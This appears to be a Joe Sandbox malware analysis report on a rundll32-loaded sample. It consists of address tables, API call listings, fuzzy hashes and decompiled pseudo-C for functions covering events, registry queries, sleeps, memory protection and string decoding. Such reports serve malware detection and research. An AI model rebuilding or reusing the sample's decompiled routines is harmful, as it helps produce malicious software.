                                                          0x036d1b52
                                                          0x036d1aa0
                                                          0x036d1aa3
                                                          0x036d1aa7
                                                          0x036d1aab
                                                          0x036d1ab0
                                                          0x036d1b48
                                                          0x036d1b48
                                                          0x00000000
                                                          0x036d1b4e
                                                          0x036d1abb
                                                          0x036d1ac4
                                                          0x036d1ad8
                                                          0x036d1adf
                                                          0x036d1af4
                                                          0x036d1afa
                                                          0x036d1b02
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1b04
                                                          0x036d1b04
                                                          0x036d1b04
                                                          0x036d1b0b
                                                          0x036d1b13
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1b15
                                                          0x036d1b1e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1b20
                                                          0x036d1b22
                                                          0x036d1b25
                                                          0x036d1b25
                                                          0x036d1b28
                                                          0x036d1b2c
                                                          0x036d1b2f
                                                          0x036d1b35
                                                          0x036d1b38
                                                          0x036d1b3f
                                                          0x00000000
                                                          0x036d1abb
                                                          0x036d1a36
                                                          0x036d1a3e
                                                          0x036d1a44
                                                          0x036d1a46
                                                          0x036d1a46
                                                          0x036d1a49
                                                          0x036d1a4b
                                                          0x00000000
                                                          0x036d1a4b
                                                          0x036d1a25
                                                          0x036d1a6b
                                                          0x036d1a70
                                                          0x036d1a72
                                                          0x036d1a72
                                                          0x036d1a75
                                                          0x036d1a75
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 036D1ADF
                                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 036D1AF4
                                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 036D1B0B
                                                          • lstrlen.KERNEL32(69B25F45), ref: 036D1B2F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 8a311da38ea68ad8a822d357c8069c3c106e3867ce68e0b5803a453c09224850
                                                          • Instruction ID: 6b01027e5985df012bdd9abe6c60572d23eb4e619e1ab2b9367c33f27d45eed1
                                                          • Opcode Fuzzy Hash: 8a311da38ea68ad8a822d357c8069c3c106e3867ce68e0b5803a453c09224850
                                                          • Instruction Fuzzy Hash: 9E519031E00208EFDB61CF99C6846ADFBB6FF46315F19805AE819AB305D7B09A51CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D498E Relevance: 7.6, APIs: 5, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D498E(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x36da310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x36da348; // 0x228d5a8
				_t3 = _t8 + 0x36db87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E036D11C3(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x36da34c, 1, 0, _t30);
					E036D6C2C(_t30);
				}
				_t12 =  *0x36da2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E036D402A(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E036D68BD(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E036D7928(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								FindCloseChangeNotification(_t25); // executed
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

















                                                          0x036d498f
                                                          0x036d4996
                                                          0x036d49a0
                                                          0x036d49a4
                                                          0x036d49aa
                                                          0x036d49b9
                                                          0x036d49c0
                                                          0x036d49c4
                                                          0x036d49d6
                                                          0x036d49d8
                                                          0x036d49d8
                                                          0x036d49dd
                                                          0x036d49e4
                                                          0x036d4a3b
                                                          0x036d4a3b
                                                          0x036d4a41
                                                          0x036d4a43
                                                          0x036d4a43
                                                          0x036d4a48
                                                          0x036d4a4d
                                                          0x036d4a51
                                                          0x036d4a63
                                                          0x036d4a63
                                                          0x036d4a67
                                                          0x036d4a6d
                                                          0x036d4a6d
                                                          0x00000000
                                                          0x036d49f4
                                                          0x036d49f4
                                                          0x036d49fb
                                                          0x00000000
                                                          0x00000000
                                                          0x036d4a02
                                                          0x036d4a0a
                                                          0x036d4a0e
                                                          0x036d4a12
                                                          0x036d4a12
                                                          0x036d4a1a
                                                          0x036d4a1f
                                                          0x036d4a23
                                                          0x036d4a27
                                                          0x036d4a7c
                                                          0x036d4a82
                                                          0x036d4a82
                                                          0x036d4a35
                                                          0x036d4a39
                                                          0x036d4a70
                                                          0x036d4a72
                                                          0x036d4a75
                                                          0x036d4a75
                                                          0x00000000
                                                          0x036d4a72
                                                          0x036d4a39
                                                          0x00000000
                                                          0x036d4a23

                                                          APIs
                                                            • Part of subcall function 036D11C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05969D70,00000000,?,?,69B25F44,00000005,036DA00C,4D283A53,?,?), ref: 036D11F9
                                                            • Part of subcall function 036D11C3: lstrcpy.KERNEL32(00000000,00000000), ref: 036D121D
                                                            • Part of subcall function 036D11C3: lstrcat.KERNEL32(00000000,00000000), ref: 036D1225
                                                          • CreateEventA.KERNEL32(036DA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,036D7187,?,?,?), ref: 036D49CF
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • StrChrW.SHLWAPI(036D7187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,036D7187,?,?,?), ref: 036D4A02
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,036D7187,00000000,00000000,?,00000000,?,036D7187,?,?,?), ref: 036D4A2F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,036D7187,?,?,?), ref: 036D4A5D
                                                          • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,036D7187,?,?,?), ref: 036D4A75
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3294472205-0
                                                          • Opcode ID: ac85831c897438106d18f831255dcd5aae713b0ccff1aea24db06e34d557b2c6
                                                          • Instruction ID: ff319fd04a5e5c6b8a9606b5fcbb0b2887c44f886a7a8c9a23ace034c33fb1f5
                                                          • Opcode Fuzzy Hash: ac85831c897438106d18f831255dcd5aae713b0ccff1aea24db06e34d557b2c6
                                                          • Instruction Fuzzy Hash: 5A21E932D053116BC732EAAAAD45B6AB7D9EB48710B0D452AFD45DB24CDFB1CC018698
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06291ECA Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628B7A4: RegCreateKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7B9
                                                            • Part of subcall function 0628B7A4: lstrlen.KERNEL32(0689B7F0,00000000,00000000,00000000,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008,00000003), ref: 0628B7E2
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F4C
                                                          • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                          • String ID:
                                                          • API String ID: 1633053242-0
                                                          • Opcode ID: e8ecddb125ee64f4de10ef5b871de956724f36854dea6bb326e10dfe4ef3e3b7
                                                          • Instruction ID: 1f017cbb9999d249fce18d516b3887516811f5d4918fcb62b25a613a2c5390ab
                                                          • Opcode Fuzzy Hash: e8ecddb125ee64f4de10ef5b871de956724f36854dea6bb326e10dfe4ef3e3b7
                                                          • Instruction Fuzzy Hash: BB113AB251024EBFDF019F95DC88CAE7B7EEB88258B100429FA0593110E7719D649B70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628212C Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,0627111D,00000000), ref: 0628214D
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06282166
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0627111D,00000000), ref: 06282183
                                                          • IsWow64Process.KERNEL32(?,?,?,?,?,?,0627111D,00000000), ref: 06282194
                                                          • FindCloseChangeNotification.KERNEL32(?,?,?,?,0627111D,00000000), ref: 062821A7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                                                          • String ID:
                                                          • API String ID: 1712524627-0
                                                          • Opcode ID: dc9db8a06bab8c0fe95d3fb3d82f34e121ee176e2204ce4d57ed5ec99d68ac9f
                                                          • Instruction ID: 25f918896541037ba48d903079ea4defb365bc0dbf632bc2ffa01d5d9118dfe1
                                                          • Opcode Fuzzy Hash: dc9db8a06bab8c0fe95d3fb3d82f34e121ee176e2204ce4d57ed5ec99d68ac9f
                                                          • Instruction Fuzzy Hash: 2B016D71A12315FFCB11EF59EC4C89A7BA9FBCA6917204225EA05D3240E7314701CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062733A5 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 062733CA
                                                          • GetLastError.KERNEL32(?,00000000), ref: 062733D2
                                                          • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 062733E9
                                                          • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0627340E
                                                          • SetLastError.KERNEL32(80000000,?,00000000), ref: 06273417
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$ErrorLastProtect$Query
                                                          • String ID:
                                                          • API String ID: 148356745-0
                                                          • Opcode ID: 0db5d81be3bc2d90f13af416bbd1c710034865d03345b90b3770399a2fa4b464
                                                          • Instruction ID: c68ffb5500f035b96a7f5f6c849e517fda4501e709da6aa5279949c003794aa2
                                                          • Opcode Fuzzy Hash: 0db5d81be3bc2d90f13af416bbd1c710034865d03345b90b3770399a2fa4b464
                                                          • Instruction Fuzzy Hash: C601E972600209BFDF129F95EC48CAEBBBAEF4D2547008036FA05E2225D7719954EFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D74FE Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 036D755B
                                                          • SysAllocString.OLEAUT32(036D3520), ref: 036D759F
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D75B3
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D75C1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 1931a46158cbfa044dd76e62e219d9c2dbeda2217728d09d1ed36065c603579a
                                                          • Instruction ID: c2ddf7000133c39b701a6bf26b388b292655c78393db870b745ae689844add0c
                                                          • Opcode Fuzzy Hash: 1931a46158cbfa044dd76e62e219d9c2dbeda2217728d09d1ed36065c603579a
                                                          • Instruction Fuzzy Hash: D5310E75D00249EFCB05DF98D8809AEBBB9FF48300B11842EF906D7250DB719641CF66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D70D8 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 41%
                                                          			E036D70D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E036D54BB(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E036D78BF(_t23);
						}
					}
					return _t38;
				}
				_t26 = E036D3695(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x36da34c, 1, 0,  *0x36da3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					FindCloseChangeNotification(_t40); // executed
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E036D71B6(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E036D3472(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E036D3AC2(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E036D498E( &_v32, _t39);
					goto L13;
				}
			}














                                                          0x036d70d8
                                                          0x036d70e5
                                                          0x036d70eb
                                                          0x036d70ec
                                                          0x036d70ed
                                                          0x036d70ee
                                                          0x036d70ef
                                                          0x036d70f3
                                                          0x036d70fa
                                                          0x036d70ff
                                                          0x036d7103
                                                          0x036d718b
                                                          0x036d718b
                                                          0x036d718e
                                                          0x036d7190
                                                          0x036d7198
                                                          0x036d719e
                                                          0x036d71a1
                                                          0x036d71a1
                                                          0x036d719e
                                                          0x036d71ac
                                                          0x036d71ac
                                                          0x036d710f
                                                          0x036d7116
                                                          0x036d7118
                                                          0x036d7118
                                                          0x036d712f
                                                          0x036d7133
                                                          0x036d7136
                                                          0x036d7141
                                                          0x036d7148
                                                          0x036d7148
                                                          0x036d7151
                                                          0x036d7155
                                                          0x036d7163
                                                          0x036d7157
                                                          0x036d7157
                                                          0x036d7158
                                                          0x036d7159
                                                          0x036d715a
                                                          0x036d715b
                                                          0x036d715c
                                                          0x036d715c
                                                          0x036d7168
                                                          0x036d716b
                                                          0x036d716f
                                                          0x036d7171
                                                          0x036d7171
                                                          0x036d7178
                                                          0x00000000
                                                          0x036d717a
                                                          0x036d717a
                                                          0x036d7187
                                                          0x00000000
                                                          0x036d7187

                                                          APIs
                                                          • CreateEventA.KERNEL32(036DA34C,00000001,00000000,00000040,?,?,76CDF710,00000000,76CDF730), ref: 036D7129
                                                          • SetEvent.KERNEL32(00000000), ref: 036D7136
                                                          • Sleep.KERNEL32(00000BB8), ref: 036D7141
                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 036D7148
                                                            • Part of subcall function 036D71B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,036D7168,?), ref: 036D71DC
                                                            • Part of subcall function 036D71B6: RegEnumKeyExA.KERNEL32(?,?,?,036D7168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,036D7168), ref: 036D7223
                                                            • Part of subcall function 036D71B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,036D7168,?,036D7168,?,?,?,?,?,036D7168,?), ref: 036D7290
                                                            • Part of subcall function 036D71B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,036D7168,?), ref: 036D72B8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 780868161-0
                                                          • Opcode ID: 54fc6eb9ed64901f0db5914febb51d2c1ff3e00b9d75da9fba5ed1801b8790b8
                                                          • Instruction ID: 01724fd9fb94c4f55e2558b2c3ba4c7aa7c9799cf95133f567b76bc0f44e39c0
                                                          • Opcode Fuzzy Hash: 54fc6eb9ed64901f0db5914febb51d2c1ff3e00b9d75da9fba5ed1801b8790b8
                                                          • Instruction Fuzzy Hash: 5F218476D00219ABDB20FFE4DD84CDEBBBDAB48350B0D4529EA11EB304D73499458BA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D12CA Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D12CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E036D6D63(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E036D6C2C(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E036D6500(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                                          0x036d12d6
                                                          0x036d12f9
                                                          0x036d1303
                                                          0x036d1309
                                                          0x036d130d
                                                          0x036d1325
                                                          0x036d132a
                                                          0x036d1372
                                                          0x036d132c
                                                          0x036d1334
                                                          0x036d1338
                                                          0x036d136f
                                                          0x036d133a
                                                          0x036d134c
                                                          0x036d1350
                                                          0x036d1366
                                                          0x036d1352
                                                          0x036d1355
                                                          0x036d1357
                                                          0x036d135c
                                                          0x036d1361
                                                          0x036d1361
                                                          0x036d135c
                                                          0x036d1350
                                                          0x036d1338
                                                          0x036d137a
                                                          0x036d137a
                                                          0x036d1381
                                                          0x036d1387
                                                          0x036d1387
                                                          0x036d12ef
                                                          0x036d12f3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyW.ADVAPI32(80000002,05969E92,05969E92), ref: 036D1303
                                                          • RegQueryValueExW.KERNEL32(05969E92,?,00000000,80000002,00000000,00000000,?,036D3551,3D036D90,80000002,036D7168,00000000,036D7168,?,05969E92,80000002), ref: 036D1325
                                                          • RegQueryValueExW.ADVAPI32(05969E92,?,00000000,80000002,00000000,00000000,00000000,?,036D3551,3D036D90,80000002,036D7168,00000000,036D7168,?,05969E92), ref: 036D134A
                                                          • RegCloseKey.KERNEL32(05969E92,?,036D3551,3D036D90,80000002,036D7168,00000000,036D7168,?,05969E92,80000002,00000000,?), ref: 036D137A
                                                            • Part of subcall function 036D6500: SafeArrayDestroy.OLEAUT32(00000000), ref: 036D6588
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                                          • String ID:
                                                          • API String ID: 486277218-0
                                                          • Opcode ID: 34fa4f626b30ad0410e34cb42e880a5923ac62a8bbbb9abd228b133a80eb4cc1
                                                          • Instruction ID: 4b2d59656fabd365af8cb61cd244e378f17459004841eb33416f8aa06d3573bf
                                                          • Opcode Fuzzy Hash: 34fa4f626b30ad0410e34cb42e880a5923ac62a8bbbb9abd228b133a80eb4cc1
                                                          • Instruction Fuzzy Hash: 8B212C7280011DAFCF11EF94DC808EE7BA9FB05290B058426FE1596920D671DD60DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06289661 Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,062762DD,?,?,?,?), ref: 06289686
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0628969D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,062762DD,?,?,?,?,?,?,00000000), ref: 062896B8
                                                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,062762DD,?,?,?,?), ref: 062896D7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateFree
                                                          • String ID:
                                                          • API String ID: 4267586637-0
                                                          • Opcode ID: 547072463921f86a25dc4cb4ee241c815efc8d5ba90809c64c6efe5afcdfec32
                                                          • Instruction ID: 1d5fd385056daaf173f3bdb49f64cee07ccb4cf090f939c11da2680e7fe58c81
                                                          • Opcode Fuzzy Hash: 547072463921f86a25dc4cb4ee241c815efc8d5ba90809c64c6efe5afcdfec32
                                                          • Instruction Fuzzy Hash: 49114FB6910219FFDB12DF99DC84CEEBBBDEB88350B104056FD05A6150E2715E80DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D4B89 Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 65%
                                                          			E036D4B89(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L036D83A6();
					_t34 = _t16 + _t13;
					_t18 = E036D5D2E(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                                                          0x036d4b8e
                                                          0x036d4b99
                                                          0x036d4b9a
                                                          0x036d4b9a
                                                          0x036d4ba6
                                                          0x036d4baf
                                                          0x036d4bb2
                                                          0x036d4bb6
                                                          0x036d4bb8
                                                          0x036d4bbd
                                                          0x036d4bbe
                                                          0x036d4bbf
                                                          0x036d4bc9
                                                          0x036d4bcc
                                                          0x036d4bd3
                                                          0x036d4bd7
                                                          0x036d4bde
                                                          0x036d4be4
                                                          0x036d4bee

                                                          APIs
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,036D1D14,?,?), ref: 036D4B9A
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,036D1D14,?,?), ref: 036D4BA6
                                                          • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 036D4BBF
                                                            • Part of subcall function 036D5D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 036D5D8D
                                                          • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,036D1D14,?,?), ref: 036D4BDE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
